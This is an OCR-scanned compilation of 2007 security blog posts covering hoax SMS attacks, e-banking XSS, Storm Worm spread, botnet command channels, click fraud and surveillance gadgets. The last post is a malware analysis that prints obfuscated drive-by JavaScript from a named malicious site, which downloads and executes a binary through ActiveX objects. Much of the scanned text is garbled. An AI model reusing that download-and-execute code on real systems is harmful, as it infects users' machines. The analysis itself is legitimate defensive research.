in respect to the real-time sandboxing of results, a concept I’m sure is on its way at SiteAdvi- 
sor, or else [6]the community has a lot to [7]contribute as always. SiteAdvisor are however 
truly embracing a Web 2.0 business model on all fronts, and it’s perhaps my favorite case 
study on commercializing an academic idea during the last year. 


1, ftp: //Adanchey. blogspot .con/2006/06 /consolidat ion or-etar bups-popping-out tal 
2, http: //ddanchev. blogspot .com/2006/02/look-whos-gonna-cash~for-evaluating.htm] 
3, http: //ddanchey. blogspot .con/2006/04/ potting-valuable~investnents-in. hin 

4, http: //revievs.cnet .con/Sitehdvisor_Plus/4505-3667_7-92529048. nea 

5, http: //reviews. cnet con/Linkscanner,Pro/4605-3667,1-82828266 html 

6. heep:/ /wwy.epybye. org 


7. http: //www.xnos.org/fileadmin/labs/wef/Whitepaper_WEF_Automatic_Drive_By_Download_Detection_English. pdf 
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3.2.28 Fake Terror SMS Sent to 10,000 People (2007-02-27 15:39) 


This is serious, and while [1]it was a hoax, it could have had much more devastating results 
acting as a propagation vector for malware, a phishing attack as the social engineering 
potential here for anything [2]offline or online is huge : 


"About 10,000 commuters who subscribe to the train operator’s timetable messaging 
service received the threatening text message on Friday night after hackers broke into the 
system. The message, sent after 9.30pm (AEDT), reads: ALLAHU AKBR FROM CONNEX! our 
inspectorS Love Killing people - if you see one coming, run. Want to bomb a train? they will 
gladly help. See you in hell! 


ALLAHU AKBR means "[3]God is the Greatest". Now which God is the greatest I'll leave 
up to your religious beliefs, though the Muslim motives are spooky and the attack directly 
undermines the citizens’ confidence in their government’s ability to protect them - what | 
anticipate next are articles on how terrorists take control over the trains. I’m very interested 
in who’s having acccess to the company’s feature, and most importantly to what extend 
are they outsourcing, or was it an insider that used someone else’s terminal to send the 
message? Here’s a related post on the interest of various governments into developing an 
[4]SMS disaster alert and warning systems and the related security/impersonation problems 
to consider. 


1. http://www.zdnet .com.au/news/security/soa/Connex_SMS_hacking under_probe/0, 130061744, 339273819, 00. htm 


2. http: //connexwhinger .blogspot .com/2007/02/who-hacked-pdp-11s .htm 


3. http://theeid.dgreetings.com/eid-ul-fitr-traditions/ 


4. http://ddanchev. blogspot .com/2006/09/vulnerabilities-in-emergency-sms.htm 
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3.2.29 XSS Vulnerabilities in E-banking Sites (2007-02-27 16:14) 


XSS Vulnerability Sample 


Enter string here: 


Quiet fren tact ennmmnand 


& 


JavaScript 
@ tf you see this you have a potential X$S wulnerabéity! 


The other day | came across to this summary with direct examples of various [1]XSS vulner- 
abilities at E-banking sites, and | wonder why the results still haven’t gotten the necessary 
attention from the affected parties : 


" First of all you should realize, that this is not the first time, that we are doing such a 
website. The last time we hit a vast number of sites, mostly german banks. We have shown, 
that those sites, that should be most secure are not! Many visitors saw the site and also the 
banks seemed quite upset, nevertheless they fixed the problems, that we pointed at. You can 
check out the archive at: [2][English version] and [3][German version] . This project has been 
done as a direct reaction to the poll done in austria not long ago and which was reported at 
[4][this article] from Heise. For the english readers of you, this article basically says, that 9 of 
10 people using online banking in austria trust the security, that their banks offer. " 


The best phishing attack at least from a technical perspective is the one that’s using a 
vulnerability in the targeted’s brand site to further improve its truthfulness, and believe it 
or not, certain phishing attacks are actually loading images directly from the victim’s sites 
instead of coming up with the phish creative on their own. 


1 ftp: /oaseportal. con/basoportal/phishnarke/ad 
2. http: //baseportal .com/baseportal/phishmarkt/en 
3. http: //oaseportal.con/basoportal/phisharkt/de 
4, http://w. heise de/security/neve/neldung/83796 


3.2.30 Credit Card Data Cloning Tactic (2007-02-27 17:32) 


First of all, she’s too cute for someone to even have the slightest suspicion, and to be honest the 
posers paying their coffee with a credit card deserve it - it leaves them without the opportunity 
to leave a change at least that’s what they’ve thought. 

[EMBED] 
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3.2.31 Storm Worm Switching Propagation Vectors (2007-02-28 16:40) 


The storm [1]started with mass mailings, then the malware switched to [2]IM propagation, 
and now the [3]infected PCs are further spreading through blog and forum posts : 


" But the twist comes when these people later post blogs or bulletin board notices. The 
software will insert into each of their postings a link to a malicious Web site, said Alperovitch, 
who rates the threat as "high." We haven’t seen the Web channel used before," he said. "In 
the past, we’ve seen malicious links distributed to people in a user’s address book and made 
to look like it’s an instant message coming from them. " 


The smart thing is that compared to situations where malware authors have to figure 
how to bypass the forum’s [4]CAPTCHA or [5]mass spam and generate new blogs, in this 
case the (infected) end user is authenticating both himself and the malware. Here are some 
[6]malware stats on social networking sites worth going through as well. 


UPDATE : Symantec has [7]a nice analysis with some screenshots of this variant. 


1. ftp: //adanchev.blogapot.con/2007/01/sccial-engineering-and-naluare. heal 
2, http://w. eveek, com/article2/0, 1759, 2095572, 00. asp?ie~EVRSS09129TK1K0000614 

3. http: //nevs. con. con/Storn-Woraevar sant rtargetatblogs.2Grbuletinvboards/2100-T349_3-6162609 eal 
4, http:/ /ddanchey, Dlogepot.con/2006/08/but~of-course~ite~plessant-transaction hel 

5. http: //ddanchev. blogspot. com/2006/1/blogosphere~and~splogs- neal 

6, http: //Adanchev. blogspot. con/2006/08/nalvare-statistice-on- social sal 

7. 


ttp://www.symantec.com/enterprise/security_response/weblog/2007/02/mespam_infecting_web_20_with_1.htm 


3.2.32 Social Engineering the Old Media (2007-02-28 16:56) 


While the [1]Rules of the Thirds are partly in place, the floating fragnance and his depressed 
look provide some clues. [2]The story is very interesting though as it has happened before. 
As Tim Nudd comments on Adfreak : 


"In Switzerland, it doesn’t take much to be in a Gucci ad campaign. You photograph 
yourself naked, add a perfume bottle and the Gucci logo, send it to a weekly paper, and have 
them bill Gucci directly for the $50,000. [3]They’II fall for it every time. " 


How it could have been prevented? Coordinating the campaign with local Gucci repre- 
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sentatives, ensuring payment is processed before the ad is featured, or let’s just say look at 
his face to figure out he’s anything but a professional model. 


1. http: //www.aeal.k12.ia.us/lois/ruleofthirds.htm 
2. http: //adweek.blogs.com/adfreak/2007/02/swiss_paper_pub.htm 


3. http://www. editorandpublisher.com/eandp/news/article_display.jsp?vnu_content_id=1003551020 


3.3 March 


3.3.1 AdSense Click Fraud Rates (2007-03-01 17:02) 


Average High Threat Level Clicks by Month Average Threat by Non-US Countries of Origin 
July - December 2006 December 2006 
@ China 
a @ France 
f United Kingdom 
@ South Africas 
= © Australia 
2. Egypt 
ra India 
- @ United Arab Emirates 
x @ Barbados 
y @ Germany 
fonth 
Derived using average threat level across all industries Derived using average threat level across all industries 
and keywords monitored by the Click Fraud Network™. and keywords monitored by ClickForensics™ broken down 


Threat Level is identified as having a high attribute rating by Country of Origin. 
score as measured by the Click Forensics™ rating engine 

using data provided by members of the Click Fraud 

Network™. 


Google’s single most profitable revenue generation source AdSense has always been under 
fire for click fraud and most importanly the company’s been under public scrutiny for better 
communicating their efforts on fighting the problem. Third party companies emerged and 
started filling the niche by coming up with click fraud analytics software so that Google’s major 
customers, even the small to mid-size business could take advantage of an automated way 
to analyze click anomalies. But how prelevant is the problem really? Should the discussion 
always orbit around Google’s efforts, to its customers’ vigilance and education on detecting 
click fraud, or should it shift to improving the communication between all participants, namely 
Google, its customers and the click auditing companies? 


According to [1]the most recent click fraud rate from Google - click fraud is only 0.002 
% of all clicks. Danny Sullivan has an in-depth analysis of the topic, emphasizing on the 
importance of detected click fraud rates : 


" Finally, we have a click fraud rate [2]from Google itself : less than 0.02 percent of all 
clicks slip past its filters and are caught after advertisers request reviews. That low figure is 
sure to bring out the critics who will disagree. Below, more about how Google comes up with 
the figure plus some click fraud fighting initiatives it plans to implement later this year.Why 
release this figure now, when many have wanted it for literally years? 


"We've been working to be more transparent and informative on the issues related to click 
fraud. Recently, this metric has been something advertisers have specifically asked for and 
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we agree that is useful in describing the scope of the problem. Further, it is something we 
measure and use to monitor the performance of our click fraud detection systems," said 
Shuman Ghosemajumder, business product manager for trust & safety at Google. " 

During [3]July, 2006 Google commissioned [4]a third-part analysis of their efforts to fight click 
fraud you will definitely find informative, and here’s [5]Janother research taking the discussion 
beyond the typical botnets and human clickers perspective. There are also [6]false click fraud 
positives to keep in mind as shown in this analysis. 


Stats courtesy of [7]Clickfraudindex who by the way [8]started blogging recently. 


. http://searchengineland.com/070301-000001 . php 


. http://adwords. blogspot .com/2007/02/invalid-clicks-googles-overall-numbers.htm 
. http: //ddanchev.blogspot.com/2006/07/latest-report-on-click-fraud.htm 


. http://googleblog.blogspot.com/pdf/Tuzhilin_Report .pd 
. http: //www.indiana.edu/%7Ephishing/papers/gandhim. pdf 


. http: //www.google.com/adwords/ReportonThird-PartyClickFraudAuditing. pdf 


. http: //www.clickfraudindex.com 


ON oO UBWN HE 
a 


. http: //www.cfnblog.com/ 


3.3.2 Real Time Censored URL Check in China (2007-03-02 17:20) 
, Testing http://en.wikipedia.org 
\’ Test complete and saved in our database. Your url is blocked! 


Your location: undefined 


Your URL is Blocked! 


v. 


greatfirewallofchina.org test server in China 


While the original initiative for [1Ja real-time URL censorship check in China was originally 
realized as a project by Jonathan Zittrain and Benjamin Edelman couple of years ago, it’s 
great to see someone continued what they’ve started and came up with the [2]GreatFire- 
wallofChina.org : 


" Aim of this website is to be a watchdog and keep track of which and how many or 
how many times sites are censored. Help to keep the censorship transparent. Each blocked 
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website will automatically be added to the great firewall on the homepage. " 


What you should keep in mind is that despite of the capability for URL checking, from a 
technical perspective the[3] censorship in China is much more sophisticated. Realizing that 
URLs themselves can be obfuscated, proxies and many other alternatives such as TOR for 
instance used, dynamic page content scanning for [4]subversive keywords and the same 
technique used for [5]sms messages is what | have in mind. For instance, according to the 
GreatFirewallofChina, blogspot.com is not blocked in the country, which doesn’t mean a 
Taiwan independence related blog’s content wouldn’t get filtered. Moreover, it’s perhaps even 
more disturbing to see various search results from a Chinese user’s perspective, than figuring 
out whether an URL is blocked or not only. Here are two [6]great screenshots confirming the 
[7]twisted reality, and a recent summary of [8]situation in China. 


It would be great to see how this project evolves and starts taking presenting the results by 
confirming whether or not an URL is blocked in [9]all of the countries on the [10]world’s censor- 
ship map, or ever better, start feeding local search engines with possibly censored keywords, 
summarize the results and emphasize on the big picture. 


http: //cyber.law.harvard.edu/filtering/china/test/index.asp 
_http://wvy.greatfirevallofchina.org/ 

_ http: //del. icio.us/DDanchev/Censorship 

http: //ddanchev. blogspot .com/2006/08/chinas- internet-censorship-report- 2006. htm 
http: //ddanchev. blogspot .com/2006/07/chinas- interest-of-censoring-mobile.htm 
http: //blog.outer-court.com/files/google-images- censorship. jpg 


http: //blog.outer-court .com/files/google-images-censorship-china. jpg 


http: //ddanchev. blogspot .com/2007/02/censorship-in-china-open-letter. html 
. bttp://www.rsf.org/24h/map . php 

10. http: //www.opennet .net/map/index2.htm 
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3.3.3 Botnet Communication Platforms (2007-03-07 11:24) 


Botnets, or the automated exploitation and management of malware infected PCs is perhaps 
the most popular and efficient cyber threat the Internet faces these days. Whether you 
define it as the war on bandwidth or who’s commanding the largest infected population, this 
simple distributed hosts management problem is continuing to evolve in order for the botnet 
masters to remain undetected for as long as possible. On the other hand, the growing Internet 
population combined with the lack of awareness of the "just got a PC for Christmas" users, and 
IPv4’s well known susceptability to IP spoofing compared to IPv6, always make the concept an 
interesting one to follow. 


Despite that at the beginning of 2006, | pointed out on how [1]malware related docu- 
mentation and howtos turned into open source code resulting in [2]a flood of malware 
variants, thus lowering the entry barries for a novice malware copycats, a week ago | located a 
very throughout document on various botnet communication platforms and I’m sure its author 
wouldn’t mind me reposting the fancy graphs and commenting on them. 


Wa 


infected 
machine 


_ - send("!cmd"); Ay IRC-operator auth CG) 
ee —————E 

3 ——_> 2 a) 

9 o 2S 


infected IRC-server @Hacker 


machine en wel 
- 


infected 
machine 


& -- /#JOIN #channel password 


recy() -- recive data from IRC 
as getcommand 
send("!cmd"}-- send command 


RC based Botnet Communications 


Nothing ground breaking in this one besides the various advices on stripping the IRCd, creating 
own network of IRC servers compared to using public ones, and on the importance of distributed 
secrecy of the botnet participants’ IPs, namely each bot would never know the exact number 
or location of all servers and bots. 
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HTTP Botnet Communications 


localhost MySQL: (fromm getermnd.php) 
SELECT cmd fon bots WHERE uvid=Al 
ee ee ee oe bots WHERE yideAz | 


SELECT cmd FROM bots WHERE vide AS | FROM bots WHERE vide AS 


8 GET [GET /getemd.phpruid=At| php?uid=AL 


infected 1 i \/ 
machine 


ys |GET /geternd.php?uid=A2 | |GET /geternd.php?uid=A2 | s 
a) <—————| send("emd") & authorizaton 
infected A2 to all bots! packet 


hacker 


http://botnet.org/ 
machine a 


GET /getemd phpruid=A3 POST /dotnet-admin.php 
~ AS 


infected © 
machine 


The possiblities with PHP and MySQL in respect to flexibility of the statistics, layered encryption 
and tunneling, and most importantly, decentralizing the command even improving authentica- 
tion with port knocking are countless. Besides, with all the buzz of botnets continuing to use 
IRC, it’s a rather logical move for botnet masters to shift to other platforms, where communi- 
cating in between HTTP’s noise improves their chance of remaining undetected. Rather ironic, 
the author warns of possible SQL injection vulnerabilities in the botnet’s command panel. 


gs 
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sCMD to all bots 
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ys sCMD <——— @ Sie i 
—————— 
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machine ieq.com |g 
server ® a 
sCMD c|§ 
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infe cted E} 


machine : 
contact list of 
infected bots 


* SCMD -- send command 


*CLB -- contact list of infected bots 
* AUTH -- authorization on icq.com 


ICQ Botnet Communications 
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Perhaps among the main reasons to repost these graphs was the ICQ communication plat- 
form which I'll leave up to you to figure out. As a major weakness is listed the reliance 
on icq.com, but as we’ve already seen cases of botnets obtaining their commands by visit- 
ing anIRC channel and processing its topic, in this case it’s ICQ WhiteLists getting the attention. 


Related comments on the programming "know-how" discussed will follow. [3]Know your 
Enemy! 


1. http://www.linuxsecurity.com/docs/malware-trends .pdf 
2. http: //ddanchev. blogspot . com/2006/08/malware-bot-families-technology-and.htm 
3. http: //www.honeynet.org/papers/kye.htm 


3.3.4 Death is Just an Upgrade (2007-03-07 12:21) 


Started as a project to digitally mimic 100 % a human’s behaviour, the [1]Virtual Soldier 
research program is getting more funding to [2]accomplish its mission, and go beyond : 


" In particular, the contract calls for the VSR team to further develop their "Predictive 
Dynamics" tools for use in calculating human motion in a military environment. Invented by 
VSR researchers, the field of Predictive Dynamics already has made a significant impact on the 
field of human motion simulation by making it possible - for the first time ever - to calculate 
the walking and running involved in human gait when given such variables as human body 
size, strength, weight, load-carrying abilities and clothing effects. " 


Next, Santos will find himself exposed to radiation, blown up on pieces, getting hit by a 
truck, or pretty much anything that you would never get the chance to - legally - expose a 
living human to, for testing purposes. 


1. http://www.digital-humans.org/ 


2. http: //www.press-citizen.com/apps/pbcs.d11/article?AID=/20070228/NEWS01/70228006/1079 


3.3.5 USB Surveillance Sticks (2007-03-07 12:34) 


Despite the ongoing awareness built among enterprises and end users on the risks posed 
by removable media, there are vendors offering various surveillance solutions over an USB 
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stick. Some are handy, others contradictive. And while [1]RFID tags are getting smaller than 
a crop of rice, here are three surveillance solutions to keep in mind right next to the notorious 
[2]KeyGhost hardware keylogger. 


[3]SnoopStick 


An 


example of malware on demand at $59.95 which comes with lots of features as well as 
automatic updates : 


"The SnoopStick monitoring components are completely hidden, and there are no telltale signs 
that the computer is being monitored. You can 


then unplug the SnoopStick and take it with you anywhere you go. No bigger than your thumb 
and less than 1/4" thick, you can carry it in your pocket, purse, or on your keychain. Any time 
you want to see what web sites your kids or employees are visiting, who they are chatting 
with, and what they are chatting about, simply plug in your SnoopStick to any Windows based 
computer with an Internet connection and a USB port. SnoopStick will automatically connect 
to the target computer. " 


¢: 


[4]TrackStick 


Portable GPS surveillance with historical routes that look simply amazing when applied at 
Google Earth : 


" The Track Stick will work anywhere on the planet Earth. Using the latest in GPS mapping 
technologies, your exact location can be shown on graphical maps and 3D satellite images. 
The Track Stick’s micro computer contains special mathematical algorithms, that can calculate 
how long you have been indoors. While visiting family, friends or even shopping, the Track 
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Stick can accurately time and map each and every place you have been. " 


Install USB Driver (E:) Bal Xx} 


This disk or device contains more than one type of 
content. 


What do you want Windows to do? 


fnstall USB Driver 
fusing the program provided on the device 


Play Media Files 
using RealPlayer 


Browse Media Files 
using Media Experience 


Play 
using Windows Media Player 


[5] GadgetTrack 

An interoperable surveillance solution supposed to assist you in case your iPod or even PSP 
get stolen, all you have to do is infect your device and prey there’s Internet connectivity at a 
later stage. Tracking your stolen devices is one thing, getting them back is completely another : 


" What if your device could phone home? Well now it can. With our patent-pending 
GadgetTrak™ system, you simply register your device and install our agent files on your 
device. If your device is missing or stolen, you log into your account and flag the device as 
lost or stolen. The next time the device is accessed it will attempt to contact us and provide 
data regarding the system it is plugged into. " 


ttp://ddanchev. blogspot .com/2007/02/rfid-tracking-miniaturization.htm 


1. 

2 
3. 
4. F ick. 
5. 


ttp://www.trackstick. com/index. htm 
ttp://www.gadgettheft.com/ 


3.3.6 Documentary on ECHELON - The Spy System (2007-03-07 22:11) 


Remember [1]ECHELON? The Uber-secretive worldwide intelligence sharing network that 
various activists once tried to poison by [2]generating fake suspicious traffic using [3]pre- 
defined keywords? Well, the system is still operating, and with the lack of transparency in 
the participating country’s use and abuse of the technology, all we need is an EU alternative 
competing with the original. 
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Watch this excellent half an hour long documentary and find out : " What exactly is Ech- 
elon? How can it invade privacy, yet protect liberty? How did this billion-dollar system miss 
the September 11th attacks? In a riveting hour, we uncover the mysterious, covert world of 
NSA’s electronic espionage. " 


[EMBED] 


http: //www.fas.org/irp/program/process/echelon. htm 


1. 
2. http://www. bugbrother .com/echelon/spookwordsgenerator .htm 
3. 


ttp://www. jamechelon.org/keywords .ht 


3.3.7 Distributed Computing with Malware (2007-03-08 14:40) 


[1]Distributed computing with malware infected PCs is nothing new as a concept, it’s just the 
lack of botnet master’s desire to contribute processing power for anything socially oriented. 
That’s until late last month, when members of [2]Berkeley’s BOINC project noticed a project 
that was suspiciously becoming popular and found out that malware [3]infected PCs had the 
BOINC client installed to participate in it : 


"It recently came to the attention of boinc staff that a multi-project cruncher called Wate who 
occupied a very high position in the boinc and project stats had reached this exalted position 
by dishonest means. 


In early June 2006 he appears to to have released onto the internet a link purporting to pro- 
vide Windows updates including now for Vista. Some 1500 members of the public worldwide 
downloaded these ‘updates’ which in fact consisted of a trojan application that downloaded 
boinc.exe and attached the person’s computer to Wate’s account, giving him the subsequent 
fraudulent credits. 


About 90 % of the people affected appear to have uninstalled or disabled the unwanted boinc 
installation, but some compromised computers are still running and crashing climate models. 
Boinc and project staff have no means of contacting the owners of these computers. " 


If only would botnet masters take this note seriously, I’m sure we’ll see certain networks 
controlling the top 10 positions at the BOINC project. A war on bandwidth or CPU power? 


1. http: //users.tkk.fi/%7Elauronen/works/hakkeri_2003. pdf 
2. http://boinc.berkeley.edu/chart_list.php 


3. http://climateapps2.oucs.ox.ac.uk/cpdnboinc/forum_thread. php?id=5314 
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3.3.8 Steganography Applications Hash Set (2007-03-08 14:56) 


Protection of intellectual property rights 


ransnison of seetmesngs whew ang sapeon | 


Goal 


Specifications 


[eoncablilaeabin witoutosicowr ee | — [eee] vee | 
Escacabity oy wih pramesothowtowr abies [weet = [= | 


Note: Crucial:+++++ WNecessary:++++ Important: +++ Desirable: ++ Useful:+ Unnecessary or irrelevant: — 
Public watermarking schemes do not need the host signal in detection/excraction; private schemes require the presence of the host. 


Resistance against normal signal processing 


Detection/ 
Extraction 


Did you know that there are over [1]600 applications capable of using steganography to 
hide data? Me neither, but here’s a company that’s innovating in the field of detecting such 
ongoing communication : 


" Backbone Security’s Steganography Analysis and Research Center (SARC) is pleased to 
announce the release of version 3.0 of SAFDB. With the fingerprints, or hash values, of every 
file artifact associated with 625 steganography applications, SAFDB is the world’s largest com- 
mercially available hash set exclusive to digital steganography and other information hiding 
applications. The database is used by Federal, state and local law enforcement; intelligence 
community; and private sector computer forensic examiners to detect the presence or use of 
steganography and extract hidden information. 


Version 3.0 contains hash values for each file artifact associated with the 625 steganography 
applications computed with the CRC-32, MD5, SHA-1, SHA-224, SHA-256, SHA-384, and SHA- 
512 algorithms. 


A free extract of SAFDB with MD5 hashes only is available to qualifying law enforcement, 
government, and intelligence agency computer forensic examiners. " Chart courtesy of 
[2]Huaiging Wang and Shuozhong Wang. And here’s a [3]related post. 


1. http://www. sarc-wv.com/news/safdb30.aspx 
2. http: //acmqueue.com/modules . php?name=Content&pa=showpage&pid=241 
3. http: //ddanchev. blogspot . com/2006/08/steganography-and-cyber-terrorism.htm 


3.3.9 UK Telecoms Lack of Web Site Privacy (2007-03-08 15:07) 


When the U.S and Canada are the benchmark it’s logical to conclude the U.K gets poor ratings 
as web site privacy especially in the commercial sector is something [1]the U.S and Canada 
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tackled a long time ago. Taking the pragmatic perspective, does it really matter in times when 
government officials abuse commercially aggregated data, one they cannot legally obtain 
by themesleves, and so they ought to perform as paper-tigers to access it? Here’s [2]an 
interesting analysis : 


"The U.K. industry, however, performed much worse in privacy. Telecom firms, espe- 
cially in the U.K., ask for more personal data than companies in other industries. This data is 
often unconnected to the request being made by the customer. 


U.K. sites are generally unclear about data sharing practices, with 23 per cent judged to be 
explicit compared to 69 per cent in the U.S. Clarity in this area has made steady gains in the 
U.S. in the past 12 months, but the U.K. has shown no significant change. 


It is not only clarity that fails in the U.K., but also the actual practices in place. Eleven of the 13 
sites routinely share personal data with other internal groups, business partners or third parties 
without explicit permission. This compared poorly with the U.S., where 40 per cent share in 
the same way. The best performing site with regards to privacy in the U.K. was O2. 


Moreover, [3]the U.K realizing its ongoing negative PR across the globe in respect to the 
[4]CCTV surveillance myopia, they’ve released a report claiming [5]ltaly’s COMINT is worse 
than their (walking) CCTV surveillance efforts. [6]To publish a privacy policy or not to publish 
a privacy policy? That "used to be" the question. 


http: //ddanchev. blogspot .com/2006/01/never-ending- cookie-debate. htm 
ttp://www.cellular-news.com/story/22437 .php 


ttp://ddanchev. blogspot .com/2006/11/londons-police-experimenting-with-head.htm 


1. 
2. 
3. 
4 
5. 
6. 


ttp://www.official-documents.gov.uk/document/hc0607/hc03/0315/0315. pdf 


ttp://ddanchev. blogspot .com/2006/11/to-publish-privacy-policy-or-not-to.htm 


3.3.10 Armed Land Robots (2007-03-09 23:45) 


[1] * After seeking to [2]dominate the air, it’s time defense contractors turn back to inno- 
vating on the ground, especially when we speak of armed and remotely controlled robots. 
Crucial for both, reconnaissance and guerilla warfare situations, movement flexibity as well as 
payload capacity is what adds more value to these robots. An Israeli based defense contractor 
[3]Elbit Systems recently introduced The Viper : 


"The Viper, which is about a foot long and weigh approximately five pounds, is pow- 
ered by a special electrical engine and operated by remote control or according to a program 
implanted in its ‘brain’ in advance. It is capable of climbing stairs, getting past obstacles 
and at the same time checks what is going on around it by means of a system of sensors. 
Equipped with a special nine-millimeter caliber Uzi machine gun, on which a laser pointer 
has been installed. The Viper is carried to the battlefield by a soldier on his back in a special 
carrier. When it is necessary to infiltrate a building safely where, for example, armed terrorists 
are hiding, the soldier lowers it to the ground, turns it on and from that moment controls it 
from a distance. " 


I’m very interested in the possibility for a 360 degree view, it’s noise generation level, 
the variety of terrains its supports, and most importantly - would it put itself back on its "feet" 
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if it inevitably turns upside down. See, you wouldn’t want your pricey attack toy acting like a 
cheap remotely controlled car toy, would you? Engadget has [4]a photo of Viper. 


Here’s a recommended article on [5]the history of armed aerial UAVs, as well as a recent story 
on [6]beam energy weapons, [7]the vomit beam in this case. 


1. http://photos1 .blogger .com/blogger/1933/1779/200/armed_robots. jpg 
ttp://www. google. com/url?sa=t&ct=resk&cd=1kurl=http/,3A,2F/,2Fddanchev .blogspot.com/2F2007/2F02/,2Fattack-of 
biting-uavs .html&ei=hOXxRaTJDI2UnQPjqr3bDAkusg=__fF-Jd 


5. http: //www.defense-update.com/features/du-1-07/feature_armedUAVs. htm 


6. http: //airbornecombatengineer.typepad.com/airborne_combat_engineer/2007/03/imbalancevomit_.htm 


7. http://blog.wired.com/defense/2007/03/navy_researchin.htm 


3.3.11 U.K’s Latest Military Satellite System (2007-03-10 00:04) 


The U.K military is about to upgrade their [1]Skynet 4 satellite system to Skynet 5: 


" Four steerable antennas give it the ability to focus bandwidth on to particular locations 
where it is most needed - where British forces are engaged in operations. 


Its technologies have also been designed to resist any interference - attempts to disable or 
take control of the spacecraft - and any efforts to eavesdrop on sensitive communications. 


An advanced receive antenna allows the spacecraft to selectively listen to signals and filter 
out attempts to "jam" it. " 


Among the many features the new system introduces, two are worth mentioning - it’s 
targeted bandwidth capability where it’s needed and the sort of DENY:ALL upgraded receive 
antenna to avoid jamming. Now pray China won’t take it down, or let [2]the debris (conve- 
niently) take care of the rest - so vulnerable it makes you want to establish a space warfare 
code of conduct. 


1. http://news .bbc.co.uk/1/hi/sci/tech/6434773.stm 
2. http: //www.defensetech. org/archives/003189.htm 
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3.3.12 Envy These Women Please (2007-03-10 00:20) 


Differentiating from the usual Most Powerful Women list, Forbes did a little niching to come up 
with a[1] slideshow of women billionaires they envy most : 


"Imagine for a moment what it would be like to be a billionaire. No more picking up af- 
ter the kids, doing dishes, worrying about how much a dress costs or pinching pennies to save 
for an amazing vacation. For the women on Forbes ’ new list of the world’s billionaires, that 
dream is a reality. But it’s not just their 10-figure fortunes that make us envious. Some of 
these women are famous; some wield enormous power; some have fascinating careers. Some 
have all three. " 


Is it just me, or inherited wealth is boring right from the very beginning? The emergence of 
the spoon people, or so they say - "[2]Spoon feeding in the long run teaches us nothing but 
the shape of the spoon" Edward Morgan Forster . A week ago | participated in a discussion 
about power, most importantly one trying to define power and we ended up with several 
states of power - positional power, the C-level executives, expertise power, or the revenge of 
the underestimated walking case studies, and networking power. It’s all [3]a cyclical process 
like pretty much anything in life. 


1. http://www.forbes.com/home/billionaires/2007/03/06/women-billionaires-rich_07billionaires_cz_1k_0308wome 
2. http://www. quoteworld.org/quotes/486 

3. http://www.oldielyrics.com/lyrics/frank_sinatra/thats_life.htm 

3.3.13 Shots from the Malicious Wild West - Sample One (2007-03-10 18:16) 

Come to daddy. At _ http://www.ms-counter.com we have an URL spreading malware through 
redirectors and the natural javascript obfuscation : 


Input URL : _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45 
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Effective URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45 
Responding IP : 81.95.148.10 

Name Lookup Time : 0.300643 

Total Retrieval Time : 0.887313 


Download Speed : 9878 


(a, 'Shell.Application'j);if (bh) {if (Gofa)) break;}}catch(e) {}}1i++;} 
<f/script><script language="JavaScript"> var xxl='xxl':var xxs=1;var 

obj_ RDS = document.createElement ('object'); xxs=xxs+l;obj_RDS5.setattribute 
{'id','obj RDS'); xxl=xxl+'sad';obj_RDS5.setattribute 
(“classid",;"*clsid:BD9"+'6C556—-6543—"+'11D0-963 A" +'-OOCO4F"+"C29E36")}; 
xX1=xxl+'sdfad';var is_ obj_adodb = O; xxs=xxs-43;try { var obj adodb = 
obj_RDS.CreateObject ("adod"+"b.stre"+"am", ""); is obj adodb = 1; } catch 


(e)t} if (is__obj adodb != 1) { xxl=xxl+'sdfad';try { var obj_adodb = new 
ActivexObject ("adod"+"b.stream"); is _ obj adodb = 1; } catch(ej{} } if 
{is obj _adodb == 1) { try { xxs=xxs-43;var obj Shellapp = 


obj_RDS.CreateObject ("Shell.Application",""); var obj _msxmlz2 = new 
ActiveXObject ("msxml2.XMLHTTP"); obj msxml2.open("GET", "liane ite 


count '+"er.com/ms"+"-counte"+"r/ loa"+"d. php eae obj _msxml2.send(); 
obj_adodh.type = 1; xxs=xxs-43;o0bj adodb.open(); obj_adodb.Urite 
{obj_msxml2.responseBody); var fn = "C:\\"4+"ie "+"upda"+"ter.exe"; XXS=xx3s- 


43;0b) adodb.SaveToFile(fn,2); obj adodb.close(); obj _Shellapp.ShellExecute 
(fin); } cateh(e){} } </script><html 


Then we get the following : 


var keyStr = "ABCDEFGHIJKLMNO"+"PQRSTUVWXYZabcdefghijk" +"Imnopqrstuvwx" 
+"yz0123456789+/="; function decode64(input) { var output = ""; var chr2, chr3, 
chrl1; var enc4, enc2, encl, enc3; var i = 0; input = input.replace(/[*A-Za-z0-9\ 
+\\=J/g, ""); do { encl = keyStr.indexOf(input.charAt(i++)); enc2 = keyStr.index 
Of(input.charAt(i++)); enc3 = keyStr.indexOf(input.charAt(i++)); enc4 = keyStr. 
indexOf(input.charAt(i++)); chrl = (encl <<>> 4); chr2 = ((enc2 & 15) 

<<>> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.from 
CharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } 
if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } while 

(i <  input.length); return output; } document.write(decode64("IDxhcHBsZXQgYXJ- 
jaGI2ZTOibXMtY291bnRici5q 
YXIiIGNVZGU9IkJhNYWFHQmFhHLMNsYXNZIiB3aWROaDOxIGhlaWdodD 
OxPjxwYXJhbSBuYW1IPSJ 1 cmwilHZhbHVIPSJodHRWOi8vbXMtY291b 
nRici5jo20vbXMtY291bnRIci9sb2FkLnBocCI+PC9hcHBsZXQ+PHNjcml 
wdCBsYW5ndWFnZTOnam ETC. ETC. ETC. 
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Deobfuscating the javascript we get to see where the binary is : 


Input URL : _http://ms-counter.com/mscounter/load.php 


Effective URL : _http://ms-counter.com/mscounter/load.php 


Responding IP : 81.95.148.10 


Name Lookup Time : 0.211247 


Total Retrieval Time : 1.065943 


Download Speed : 12898 


Server Response : 

HTTP/1.1 200 OK 

Date: Sat, 10 Mar 2007 00:49:27 GMT 

Server: Apache 

X-Powered-By: PHP/4.4.4 

Content-Disposition: attachment; filename="codecs.exe" 
Connection: close 

Transfer-Encoding: chunked 

Content-Type: application/exe 


File info : 

File size: 13749 bytes 

MD5: f0778c52e26afde81dffcd5c67f1c275 

SHA1: d61c6c17b78db28788f9a89c12b182a2b1744484 
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Running it over VT we get the following results you can see in the screenshot. 


Antivir 7.3.1.41 03.09.2007 |TR/Delphi.Downloader.Gen 
Authentium 4.93.8 03.09.2007 |Possibly a new variant of W32/new-malware!Maximus 
Avast 4.7.936.0 03.09.2007 |no virus found 

